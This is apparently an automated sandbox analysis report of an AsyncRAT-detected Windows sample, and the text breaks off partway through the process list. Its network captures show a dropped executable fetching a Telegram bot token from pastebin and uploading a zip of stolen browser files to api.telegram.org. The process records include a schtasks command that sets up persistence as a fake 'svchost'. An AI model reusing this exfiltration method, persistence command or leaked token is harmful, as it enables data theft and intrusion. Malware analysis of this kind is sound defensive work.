                                                                  2024-06-28 09:19:56 UTC16355OUTData Raw: 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73
                                                                  Data Ascii: 4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5Grabber\DRIVE-C\Users
                                                                  2024-06-28 09:19:56 UTC16355OUTData Raw: 19 d3 11 46 c4 7c 0e 25 62 a7 03 1d 19 63 84 a3 b9 de c5 75 39 4a 07 06 84 ae dc f7 3e 07 4d ca a0 77 aa ea 11 a6 77 a1 cc 31 7a 38 9b 40 5a 3d bd 3d cc f4 cb d7 69 3b 20 70 4e 04 32 95 f3 4a 8d 84 ef d0 3a f3 0a 31 a7 d9 78 4e bf 3a 9c 0f 7d 1c 84 a6 e4 9f 52 92 d8 cf dc 48 eb 21 bd d8 c9 3f a3 b5 a2 8a b6 65 ca d9 cb 14 4f c3 1b 78 b0 db 33 a7 24 60 96 d6 d5 47 22 1c 01 ed ed c1 d0 67 fe 4b be a7 30 18 ad 68 1b 86 d3 2b 7e 07 23 cd 31 1d 48 eb ae 3a 84 b6 9c e8 4f e8 46 d0 2a 0c a2 cd 9f 89 63 5a d8 f4 ab ae ed 65 42 50 02 52 fe f6 c0 b2 3b 08 ae 04 40 4d a6 0e ca ec 09 f9 d8 49 c5 bd 91 46 00 52 ec 81 05 7e b4 24 9a 3a ad d7 f5 9d 92 83 43 9d 3d 89 36 e7 1b e6 e9 f0 18 54 a4 1c 35 9a 01 51 75 ea 20 b9 a9 d8 cc cb b2 83 c5 5c 7f 1f e8 81 f0 4a d3 4d b1
                                                                  Data Ascii: F|%bcu9J>Mww1z8@Z==i; pN2J:1xN:}RH!?eOx3$`G"gK0h+~#1H:OF*cZeBPR;@MIFR~$:C=6T5Qu \JM
                                                                  2024-06-28 09:19:56 UTC16355OUTData Raw: ca 37 c3 35 58 16 73 54 49 8c e1 af 09 85 14 d9 b1 24 3d 9f a4 13 4e 03 d3 29 06 e6 a7 81 92 c9 8f 25 a6 9f 25 71 50 6a 08 b9 23 8b fc 24 89 c2 eb 23 48 d0 0d 35 86 92 a8 03 89 55 30 88 09 4a 5e 4a 3d 85 73 90 31 95 8f 86 98 a0 d4 53 60 48 43 31 ec fb 5c c0 d1 e2 3e e7 aa c4 4f fd fc 18 ca 0f d1 a7 8a e3 c3 f9 0b 5f b0 d8 33 3b 50 4b e4 5b e6 2e 57 dd 77 6d 4a d7 1f 6b c3 6f 10 52 f2 71 3e 2c 8b 25 fa 0c 47 02 1c d1 a5 12 c6 ae 7e 22 84 18 1c b9 74 83 84 f6 85 94 70 87 2c 12 98 22 21 5b 5f 4f 49 cf ff 12 86 60 b6 a9 53 0b 0d 0c b6 00 44 ef 0e aa 27 61 27 8e 8f dc ce ad ab de 47 76 a8 e0 50 d7 43 93 d0 98 fc 87 84 3f 27 dd 63 34 ba d4 4f a0 13 a8 20 0f 08 3d 92 f4 27 32 a9 76 92 30 95 84 cc d2 aa 1d ca 04 5a 1c 84 a0 46 e2 1a 47 10 06 ee 92 a0 41 a9 16 02
                                                                  Data Ascii: 75XsTI$=N)%%qPj#$#H5U0J^J=s1S`HC1\>O_3;PK[.WwmJkoRq>,%G~"tp,"![_OI`SD'a'GvPC?'c4O ='2v0ZFGA
                                                                  2024-06-28 09:19:56 UTC16355OUTData Raw: 1f cc d5 c9 36 c9 58 07 8b 7f 4b dc 16 68 e3 a9 d5 2a bd 26 f6 ea db 8a 01 93 fa 74 68 f2 8c e9 e5 a9 ba eb 4b f5 7c 7d ae 85 73 86 54 98 55 e5 f0 ac d3 f5 b6 cf a4 8d 12 04 19 9d 71 4f 15 aa e8 2c 68 35 d3 c4 87 fa f7 7d 76 a4 9e 8a 49 b3 d9 8f 90 a4 92 e9 b2 36 36 da 93 fc 1a e8 c2 72 7a 82 13 1e 0a 1a d3 04 60 7b 81 00 bc 76 81 ef 2f 29 ae a5 e1 eb 84 ff d4 5a ff 7d 21 80 ed 64 2f 9e 84 bf 6f d9 64 3f 5c d9 1f d8 0d 4a 4c 5c f5 be f0 ec 1e 7a 19 0a ff 2a a9 88 dd 66 df ed 22 00 f7 ca b7 c2 44 b7 08 80 78 cd aa 70 f8 58 dc ef 84 09 51 48 a9 68 f2 f4 83 e2 e1 d2 ef 61 cd 93 4b fa b1 36 02 0d 7b dc 29 90 ea 2c 86 ad d6 2e 62 8c 8c b3 ff 0f 2a dc e9 0c 9b a4 a9 41 20 99 ae 9f 51 cc c2 c0 60 a7 95 50 91 73 3b e2 e2 93 aa 04 c7 58 3b 76 91 56 4b f7 a8 c0 f0
                                                                  Data Ascii: 6XKh*&thK|}sTUqO,h5}vI66rz`{v/)Z}!d/od?\JL\z*f"DxpXQHhaK6{),.b*A Q`Ps;X;vVK
                                                                  2024-06-28 09:19:56 UTC16355OUTData Raw: 90 3e fe 8a 7b a8 16 cd f8 21 4c 83 61 49 83 2d cf 55 be 39 2e 19 e9 d3 3b 01 43 ab 49 47 61 4c e3 3c de 76 a4 8c 0b 73 66 52 6d 31 04 0f 96 24 54 95 99 62 0e 38 6b 0e 65 c5 a0 73 3b ab 03 9f 77 d3 f6 91 8a b6 27 27 08 b8 55 5e 49 4a e7 7a 9e 33 e3 0c 5f 09 57 45 47 df c5 35 7f 87 99 ef 59 3f f9 6a c2 ce 5c c6 0f e5 9e b9 c1 1f 39 ac db 78 17 10 1b 64 e9 b7 12 36 94 8c 72 12 b9 f7 4b d9 c1 cd 45 f0 83 73 16 2f c9 b0 fa 9d 1a e3 24 20 5e 08 f1 a1 b5 c8 1f 80 c8 79 31 48 1e 56 a0 a3 d7 ee 9b 79 3d 98 4a 1b 60 ab 77 ad 38 44 1a 99 3c 18 fa c8 13 64 75 8f 54 47 c9 45 f0 41 62 b2 cd 94 d9 9d 24 bb 9d 7d 7d d0 8f 78 ee 6b bc 21 77 6d 42 f3 35 01 a8 15 c0 34 4d 65 58 fd 4c c8 2a 9d 98 16 61 70 4b ae ef f5 11 38 b8 00 85 76 36 3b cf d8 f4 71 70 fe fd d0 b5 42 b5
                                                                  Data Ascii: >{!LaI-U9.;CIGaL<vsfRm1$Tb8kes;w''U^IJz3_WEG5Y?j\9xd6rKEs/$ ^y1HVy=J`w8D<duTGEAb$}}xk!wmB54MeXL*apK8v6;qpB
                                                                  2024-06-28 09:19:56 UTC25INHTTP/1.1 100 Continue
                                                                  2024-06-28 09:19:56 UTC893INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 28 Jun 2024 09:19:56 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 505
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":974,"from":{"id":6766280506,"is_bot":true,"first_name":"Diamotriiix","username":"diamotrixedbot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1719566396,"document":{"file_name":"C_UsersuserAppDataLocala6951299a1e0d1ba1371dbc36b7a92d9user@88.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIDzmZ-gDx51sJCRW0m1A1KWKvDulRWAAIyHAACmJL4U8SLoH2unx6SNQQ","file_unique_id":"AgADMhwAApiS-FM","file_size":151803}}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.464801104.20.4.2354435052C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:57 UTC74OUTGET /raw/7B75u64B HTTP/1.1
                                                                  Host: pastebin.com
                                                                  Connection: Keep-Alive
                                                                  2024-06-28 09:19:57 UTC391INHTTP/1.1 200 OK
                                                                  Date: Fri, 28 Jun 2024 09:19:57 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  x-frame-options: DENY
                                                                  x-content-type-options: nosniff
                                                                  x-xss-protection: 1;mode=block
                                                                  cache-control: public, max-age=1801
                                                                  CF-Cache-Status: EXPIRED
                                                                  Last-Modified: Fri, 28 Jun 2024 07:39:15 GMT
                                                                  Server: cloudflare
                                                                  CF-RAY: 89ac99204aff4264-EWR
                                                                  2024-06-28 09:19:57 UTC52INData Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a
                                                                  Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
                                                                  2024-06-28 09:19:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.464802149.154.167.2204435052C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-06-28 09:19:58 UTC254OUTPOST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary="10e946af-e98d-41dd-8591-bd5457d5eee6"
                                                                  Host: api.telegram.org
                                                                  Content-Length: 152152
                                                                  Expect: 100-continue
                                                                  2024-06-28 09:19:58 UTC40OUTData Raw: 2d 2d 31 30 65 39 34 36 61 66 2d 65 39 38 64 2d 34 31 64 64 2d 38 35 39 31 2d 62 64 35 34 35 37 64 35 65 65 65 36 0d 0a
                                                                  Data Ascii: --10e946af-e98d-41dd-8591-bd5457d5eee6
                                                                  2024-06-28 09:19:58 UTC265OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 61 36 39 35 31 32 39 39 61 31 65 30 64 31 62 61 31 33 37 31 64 62 63 33 36 62 37 61 39 32 64 39 5c 6a 6f 6e 65 73 40 38 38 38 36 38 33 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 61 36 39 35 31 32 39 39 61 31 65 30 64 31 62 61 31 33 37 31 64 62 63 33 36 62 37 61 39 32 64 39 25 35 43 6a 6f 6e 65 73 25 34 30 38 38 38 36 38 33 5f 65 6e 2d
                                                                  Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5Ca6951299a1e0d1ba1371dbc36b7a92d9%5Cuser%40888683_en-
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 2e 46 dc 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 76 2a dc 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 76 2a dc 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae
                                                                  Data Ascii: PK.FXBrowsers\Edge\PKv*XQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKv*XceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: 3d 99 eb a5 b3 56 c8 86 b6 9e 01 fb 0c dd 62 6a a3 34 e7 7c 08 bb 60 1d af 40 f8 2b be fa eb c0 0f eb f0 74 e3 f3 2c de 19 f5 48 7e d6 f4 21 06 57 8c 2a aa 87 58 c6 05 8f 52 af 4c e7 46 b4 5f c0 42 a9 da 35 77 8b 46 18 e7 f5 91 6b 98 06 f7 bd 70 52 90 5e af d3 a4 78 a8 7d 4d 70 45 1b 51 80 6f 45 1a 6f 3b 45 ab d3 f7 f3 ab 7d 58 46 27 ff c9 be 19 16 2c 13 ea 11 5b c8 09 05 3b 52 87 5a 6e ba 69 c6 0e 29 e9 e7 4d 6c a7 76 84 d5 da 43 7c bd 0c b9 e7 f3 08 57 fa 6d 3c 2a 96 18 8f 7b f3 e4 08 84 98 ce 87 9b b1 ba d3 5e d3 b8 98 0a 82 db b9 d4 a7 82 2d 15 05 ce 14 ce 7d ba 3b 93 93 58 df fd d0 eb 51 82 e7 54 de d9 4b e2 6f 13 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 4b 03 04 14 00 00 00 08 00 52 40 44 57 43 fa 88 fe 82 02 00 00 02 04 00 00 3d 00
                                                                  Data Ascii: =Vbj4|`@+t,H~!W*XRLF_B5wFkpR^x}MpEQoEo;E}XF',[;RZni)MlvC|Wm<*{^-};XQTKoJJ{_;PKR@DWC=
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: d8 41 b2 dd a7 ae 93 24 18 c6 b1 68 57 88 6d 8f fd 1b 0b a9 f2 4a d1 dc 74 e9 ba ac bf 2b c0 a3 60 ce 99 64 a9 be af 19 a8 54 2f 2b d7 d9 c2 2d f7 f2 07 dc 76 81 93 c3 31 50 ae 79 87 53 ff 0a 1d 9d d1 7b d8 56 d8 7f 1d f9 0a 44 56 ef 8e be 59 f1 0f 96 40 cd 03 fb 64 8e e0 23 ba f0 e9 ee 18 0a 65 91 61 cf 79 7e 4b fc 38 2a 2c 1f 49 5b e4 62 07 3f 91 8a 1d 31 73 a8 c5 34 0d 19 2e 44 28 35 7c 68 ee b6 35 54 ed 6b 38 7e df 0b 6d 84 fe 8a cb 81 3e 46 62 9b 29 e7 88 b9 5f 4c 9c c9 0c 32 92 58 01 12 3c c3 12 db 19 f3 73 30 4b 1d 1e 14 b2 c0 e8 2e 7a 49 7a d3 7b 18 78 bb f4 29 6b 5e 76 ba cd 35 8b bf bf 7f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a
                                                                  Data Ascii: A$hWmJt+`dT/+-v1PyS{VDVY@d#eay~K8*,I[b?1s4.D(5|h5Tk8~m>Fb)_L2X<s0K.zIz{x)k^v5PKQ@DWYE4Grabber\DRIVE-C\Users\j
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: 34 b2 7b 28 ab 4b bc 52 af dc e2 67 6d 47 d5 5c 6f 68 c9 65 4d 6d 38 44 34 46 6a 9b ef 2e 79 7f 5e 29 d9 6d ab 2f d0 c3 99 62 6d 8c 2d d4 ee c5 ab 8f 80 bf 11 30 ae be eb f5 95 a3 28 e3 c8 bb 2b 87 c6 0b 5d f6 c2 91 ed d2 55 1c 57 4f 6b 71 99 c1 56 13 43 30 67 50 af a7 97 7e a7 b7 a9 dd 1c e6 1e 37 03 56 3b a1 49 c7 3c ae b5 7b 16 5d 9f ba dc 12 68 56 2b 1f be 8b bd 94 f5 da 75 c9 d2 53 6f f9 50 1b 1f eb 13 db 43 6e 8f 53 e3 cf 45 a0 80 c2 2e e5 dd 69 3e 9b 85 3a f3 41 83 36 94 7b 8c 31 9c 94 36 70 aa fc fb 22 32 f4 ca a9 9e 0b 2f 91 d1 cf 6b de ab 70 3f 49 6a 44 28 3e 31 aa 05 7d 9d b8 e3 1c fa f7 e7 0f 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 50 ad d3 d6 82 02 00 00 02 04 00 00 35 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73
                                                                  Data Ascii: 4{(KRgmG\oheMm8D4Fj.y^)m/bm-0(+]UWOkqVC0gP~7V;I<{]hV+uSoPCnSE.i>:A6{16p"2/kp?IjD(>1}PKQ@DWP5Grabber\DRIVE-C\Users
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: 19 d3 11 46 c4 7c 0e 25 62 a7 03 1d 19 63 84 a3 b9 de c5 75 39 4a 07 06 84 ae dc f7 3e 07 4d ca a0 77 aa ea 11 a6 77 a1 cc 31 7a 38 9b 40 5a 3d bd 3d cc f4 cb d7 69 3b 20 70 4e 04 32 95 f3 4a 8d 84 ef d0 3a f3 0a 31 a7 d9 78 4e bf 3a 9c 0f 7d 1c 84 a6 e4 9f 52 92 d8 cf dc 48 eb 21 bd d8 c9 3f a3 b5 a2 8a b6 65 ca d9 cb 14 4f c3 1b 78 b0 db 33 a7 24 60 96 d6 d5 47 22 1c 01 ed ed c1 d0 67 fe 4b be a7 30 18 ad 68 1b 86 d3 2b 7e 07 23 cd 31 1d 48 eb ae 3a 84 b6 9c e8 4f e8 46 d0 2a 0c a2 cd 9f 89 63 5a d8 f4 ab ae ed 65 42 50 02 52 fe f6 c0 b2 3b 08 ae 04 40 4d a6 0e ca ec 09 f9 d8 49 c5 bd 91 46 00 52 ec 81 05 7e b4 24 9a 3a ad d7 f5 9d 92 83 43 9d 3d 89 36 e7 1b e6 e9 f0 18 54 a4 1c 35 9a 01 51 75 ea 20 b9 a9 d8 cc cb b2 83 c5 5c 7f 1f e8 81 f0 4a d3 4d b1
                                                                  Data Ascii: F|%bcu9J>Mww1z8@Z==i; pN2J:1xN:}RH!?eOx3$`G"gK0h+~#1H:OF*cZeBPR;@MIFR~$:C=6T5Qu \JM
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: ca 37 c3 35 58 16 73 54 49 8c e1 af 09 85 14 d9 b1 24 3d 9f a4 13 4e 03 d3 29 06 e6 a7 81 92 c9 8f 25 a6 9f 25 71 50 6a 08 b9 23 8b fc 24 89 c2 eb 23 48 d0 0d 35 86 92 a8 03 89 55 30 88 09 4a 5e 4a 3d 85 73 90 31 95 8f 86 98 a0 d4 53 60 48 43 31 ec fb 5c c0 d1 e2 3e e7 aa c4 4f fd fc 18 ca 0f d1 a7 8a e3 c3 f9 0b 5f b0 d8 33 3b 50 4b e4 5b e6 2e 57 dd 77 6d 4a d7 1f 6b c3 6f 10 52 f2 71 3e 2c 8b 25 fa 0c 47 02 1c d1 a5 12 c6 ae 7e 22 84 18 1c b9 74 83 84 f6 85 94 70 87 2c 12 98 22 21 5b 5f 4f 49 cf ff 12 86 60 b6 a9 53 0b 0d 0c b6 00 44 ef 0e aa 27 61 27 8e 8f dc ce ad ab de 47 76 a8 e0 50 d7 43 93 d0 98 fc 87 84 3f 27 dd 63 34 ba d4 4f a0 13 a8 20 0f 08 3d 92 f4 27 32 a9 76 92 30 95 84 cc d2 aa 1d ca 04 5a 1c 84 a0 46 e2 1a 47 10 06 ee 92 a0 41 a9 16 02
                                                                  Data Ascii: 75XsTI$=N)%%qPj#$#H5U0J^J=s1S`HC1\>O_3;PK[.WwmJkoRq>,%G~"tp,"![_OI`SD'a'GvPC?'c4O ='2v0ZFGA
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: 1f cc d5 c9 36 c9 58 07 8b 7f 4b dc 16 68 e3 a9 d5 2a bd 26 f6 ea db 8a 01 93 fa 74 68 f2 8c e9 e5 a9 ba eb 4b f5 7c 7d ae 85 73 86 54 98 55 e5 f0 ac d3 f5 b6 cf a4 8d 12 04 19 9d 71 4f 15 aa e8 2c 68 35 d3 c4 87 fa f7 7d 76 a4 9e 8a 49 b3 d9 8f 90 a4 92 e9 b2 36 36 da 93 fc 1a e8 c2 72 7a 82 13 1e 0a 1a d3 04 60 7b 81 00 bc 76 81 ef 2f 29 ae a5 e1 eb 84 ff d4 5a ff 7d 21 80 ed 64 2f 9e 84 bf 6f d9 64 3f 5c d9 1f d8 0d 4a 4c 5c f5 be f0 ec 1e 7a 19 0a ff 2a a9 88 dd 66 df ed 22 00 f7 ca b7 c2 44 b7 08 80 78 cd aa 70 f8 58 dc ef 84 09 51 48 a9 68 f2 f4 83 e2 e1 d2 ef 61 cd 93 4b fa b1 36 02 0d 7b dc 29 90 ea 2c 86 ad d6 2e 62 8c 8c b3 ff 0f 2a dc e9 0c 9b a4 a9 41 20 99 ae 9f 51 cc c2 c0 60 a7 95 50 91 73 3b e2 e2 93 aa 04 c7 58 3b 76 91 56 4b f7 a8 c0 f0
                                                                  Data Ascii: 6XKh*&thK|}sTUqO,h5}vI66rz`{v/)Z}!d/od?\JL\z*f"DxpXQHhaK6{),.b*A Q`Ps;X;vVK
                                                                  2024-06-28 09:19:58 UTC16355OUTData Raw: 90 3e fe 8a 7b a8 16 cd f8 21 4c 83 61 49 83 2d cf 55 be 39 2e 19 e9 d3 3b 01 43 ab 49 47 61 4c e3 3c de 76 a4 8c 0b 73 66 52 6d 31 04 0f 96 24 54 95 99 62 0e 38 6b 0e 65 c5 a0 73 3b ab 03 9f 77 d3 f6 91 8a b6 27 27 08 b8 55 5e 49 4a e7 7a 9e 33 e3 0c 5f 09 57 45 47 df c5 35 7f 87 99 ef 59 3f f9 6a c2 ce 5c c6 0f e5 9e b9 c1 1f 39 ac db 78 17 10 1b 64 e9 b7 12 36 94 8c 72 12 b9 f7 4b d9 c1 cd 45 f0 83 73 16 2f c9 b0 fa 9d 1a e3 24 20 5e 08 f1 a1 b5 c8 1f 80 c8 79 31 48 1e 56 a0 a3 d7 ee 9b 79 3d 98 4a 1b 60 ab 77 ad 38 44 1a 99 3c 18 fa c8 13 64 75 8f 54 47 c9 45 f0 41 62 b2 cd 94 d9 9d 24 bb 9d 7d 7d d0 8f 78 ee 6b bc 21 77 6d 42 f3 35 01 a8 15 c0 34 4d 65 58 fd 4c c8 2a 9d 98 16 61 70 4b ae ef f5 11 38 b8 00 85 76 36 3b cf d8 f4 71 70 fe fd d0 b5 42 b5
                                                                  Data Ascii: >{!LaI-U9.;CIGaL<vsfRm1$Tb8kes;w''U^IJz3_WEG5Y?j\9xd6rKEs/$ ^y1HVy=J`w8D<duTGEAb$}}xk!wmB54MeXL*apK8v6;qpB
                                                                  2024-06-28 09:19:59 UTC25INHTTP/1.1 100 Continue
                                                                  2024-06-28 09:19:59 UTC405INHTTP/1.1 401 Unauthorized
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 28 Jun 2024 09:19:59 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 58
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:05:18:54
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\Desktop\zrrHgsDzgS.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\zrrHgsDzgS.exe"
                                                                  Imagebase:0x660000
                                                                  File size:48'640 bytes
                                                                  MD5 hash:6D13D147A209E3BE044035F0C03B7BDE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1725153654.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1725732577.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:1
                                                                  Start time:05:18:58
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:05:18:59
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:05:18:59
